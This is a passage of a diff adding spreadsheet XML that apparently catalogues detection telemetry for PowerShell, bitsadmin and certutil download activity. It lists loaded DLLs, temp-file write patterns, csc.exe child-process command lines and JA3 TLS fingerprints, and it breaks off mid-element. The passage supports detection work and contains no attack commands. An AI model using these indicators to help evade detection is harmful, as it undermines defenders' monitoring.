+e.g CLI: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.cmdline"
+Parent: csc.exe
+Child: cvtres.exe
+e.g CLI: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\MATTHE~1\AppData\Local\Temp\RESFCDF.tmp" "c:\Users\Matthew Green\AppData\Local\Temp\CSCE16EBB1FED2F4AC18AA8CE44A18F7.TMP"
+</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Routing Utilities - C:\Windows\System32\rtutils.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Remote Access Connection Manager - C:\Windows\System32\rasman.dll
+Remote Access API - C:\Windows\System32\rasapi32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell.exe writes:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">C:\Users\*\AppData\Local\Temp\*.err
+C:\Users\*\AppData\Local\Temp\*.out
+C:\Users\*\AppData\Local\Temp\*.cmdline
+C:\Users\*\AppData\Local\Temp\*.dll
+C:\Users\*\AppData\Local\Temp\*.cs
+C:\Users\*\AppData\Local\Temp\*.tmp
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>e.g:
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
+C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.err
+C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.out
+C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.cmdline
+C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.dll
+C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.0.cs
+C:\Users\Matthew Green\AppData\Local\Temp\jpbwyr5c.tmp
+C:\Users\Matthew Green\AppData\Local\Temp\__PSScriptPolicyTest_c3dckupj.mp5.psm1
+C:\Users\Matthew Green\AppData\Local\Temp\__PSScriptPolicyTest_n4wef3ch.m4j.ps1</t>
+    </r>
+  </si>
+  <si>
+    <t>JA3_footprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0
+JA3_hash: a0e9f5d64349fb13191bc781f81f42e1</t>
+  </si>
+  <si>
+    <t>JA3_footprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0
+JA3_hash: bd0bf25947d4a37404f0424edf4db9ad</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Background Intelligent Transfer Service Proxy - C:\Windows\System32\BitsProxy.dll
+Microsoft Windows BITS Managed Library - C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\542c2e5af7d5e3b6a94baf2bccd7a410\Microsoft.PowerShell.Commands.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell loads additional modules:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\fa13923a20a9ae44540d6438a1f677b6\Microsoft.PowerShell.Commands.Management.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Bitsadmin.exe loads:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Advanced Windows 32 Base API - C:\Windows\System32\advapi32.dll
+AppModel API Host - C:\Windows\System32\kernel.appcore.dll
+BITS administration utility - C:\Windows\System32\bitsadmin.exe
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Background Intelligent Transfer Service Proxy - C:\Windows\System32\qmgrprxy.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
+COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
+Cryptographic Service Provider API - C:\Windows\System32\cryptsp.dll
+GDI Client DLL - C:\Windows\System32\gdi32.dll
+Host for SCM/SDDL/LSA Lookup APIs - C:\Windows\System32\sechost.dll
+MSCTF Server DLL - C:\Windows\System32\msctf.dll
+Microsoft COM for Windows - C:\Windows\System32\combase.dll
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Microsoft OLE for Windows - C:\Windows\System32\ole32.dll
+Microsoft UxTheme Library - C:\Windows\System32\uxtheme.dll
+Multi-User Windows IMM32 API Client DLL - C:\Windows\System32\imm32.dll
+Multi-User Windows USER API Client DLL - C:\Windows\System32\user32.dll
+NT Layer DLL - C:\Windows\System32\ntdll.dll
+Remote Procedure Call Runtime - C:\Windows\System32\rpcrt4.dll
+Security Support Provider Interface - C:\Windows\System32\sspicli.dll
+Shell Light-weight Utility Library - C:\Windows\System32\shlwapi.dll
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
+Windows NT BASE API Client DLL - C:\Windows\System32\KernelBase.dll
+Windows NT BASE API Client DLL - C:\Windows\System32\kernel32.dll
+Windows NT CRT DLL - C:\Windows\System32\msvcrt.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\542c2e5af7d5e3b6a94baf2bccd7a410\Microsoft.PowerShell.Commands.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Bitsadmin additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft OLE for Windows - C:\Windows\System32\ole32.dll
+Background Intelligent Transfer Service Proxy - C:\Windows\System32\BitsProxy.dll
+COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
+Microsoft UxTheme Library - C:\Windows\System32\uxtheme.dll
+Multi-User Windows IMM32 API Client DLL - C:\Windows\System32\imm32.dll
+Microsoft® C Runtime Library - C:\Windows\System32\msvcp_win.dll
+GDI Client DLL - C:\Windows\System32\gdi32full.dll
+GDI Client DLL - C:\Windows\System32\gdi32.dll
+Win32u - C:\Windows\System32\win32u.dll
+Multi-User Windows USER API Client DLL - C:\Windows\System32\user32.dll
+AppModel API Host - C:\Windows\System32\kernel.appcore.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\542c2e5af7d5e3b6a94baf2bccd7a410\Microsoft.PowerShell.Commands.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Certutil.exe loads:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Isolation Library for Internet Explorer - C:\Windows\System32\msIso.dll
+Windows NT Image Helper - C:\Windows\System32\imagehlp.dll
+OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Internet Extensions for Win32 - C:\Windows\System32\wininet.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
+Data Protection API - C:\Windows\System32\dpapi.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
